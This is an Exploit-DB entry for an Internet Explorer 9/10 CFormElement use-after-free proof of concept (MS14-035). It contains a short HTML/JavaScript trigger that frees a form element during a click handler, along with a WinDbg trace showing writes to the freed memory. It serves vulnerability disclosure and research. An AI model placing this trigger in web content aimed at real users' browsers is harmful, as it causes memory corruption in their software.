Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

EDB-ID:

34010

CVE:

2014-2782 2014-2777 2014-2776 2014-2775 2014-2773 2014-2772 2014-2771 2014-2770 2014-2769 2014-2768 2014-2767 2014-2766 2014-2765 2014-2764 2014-2763 2014-2761 2014-2760 2014-2759 2014-2758 2014-2757 2014-2756 2014-2755 2014-2754 2014-2753 2014-1805 2014-1804 2014-1803 2014-1802 2014-1800 2014-1799 2014-1797 2014-1796 2014-1795 2014-1794 2014-1792 2014-1791 2014-1790 2014-1789 2014-1788 2014-1786 2014-1785 2014-1784 2014-1783 2014-1782 2014-1781 2014-1780 2014-1779 2014-1778 2014-1777 2014-1775 2014-1774 2014-1773 2014-1772 2014-1771 2014-1770 2014-1769 2014-1766 2014-1764 2014-1762 2014-0282

EDB Verified:

Author:

Drozdova Liudmila

Type:

dos

Exploit:   /  

Platform:

Windows_x86

Date:

2014-07-08

Vulnerable App: 
<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Window 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>

<body>


<form id="form1">
   <input id="input1" type="text" value="">
</form>


<script>

	loaded = false ;

function func()	{

	if (loaded)	{
		document.body.innerHTML = "" ; // free CFormElement
	}

}

    
	input1 = document.getElementById("input1") ;
	input1.onclick = func ;
	loaded = true ;
	input1.click(); // Call DoClick function
	
	


</script>
</body>

</html>
<!--
Vulnerability details

MSHTML!CInput::DoClick

66943670 8bcf            mov     ecx,edi
66943672 ff751c          push    dword ptr [ebp+1Ch]
66943675 ff7518          push    dword ptr [ebp+18h]
66943678 ff7514          push    dword ptr [ebp+14h]
6694367b ff7510          push    dword ptr [ebp+10h]
6694367e ff750c          push    dword ptr [ebp+0Ch]
66943681 ff7508          push    dword ptr [ebp+8]  <---- esi = CFormElement
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
66943689 85db            test    ebx,ebx 
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe        and     dword ptr [esi+68h],0FFFFFFFEh  ; memory corruption, write to freed memory

 MSHTML!CInput::DoClick+0x60:
66943681 ff7508          push    dword ptr [ebp+8]    ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20  6661ead8 MSHTML!CFormElement::`vftable'



0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            c  LFH;busy 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db            test    ebx,ebx
0:005> dds esi l1
0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c




0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            0  LFH;free 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)  [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001


-->
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services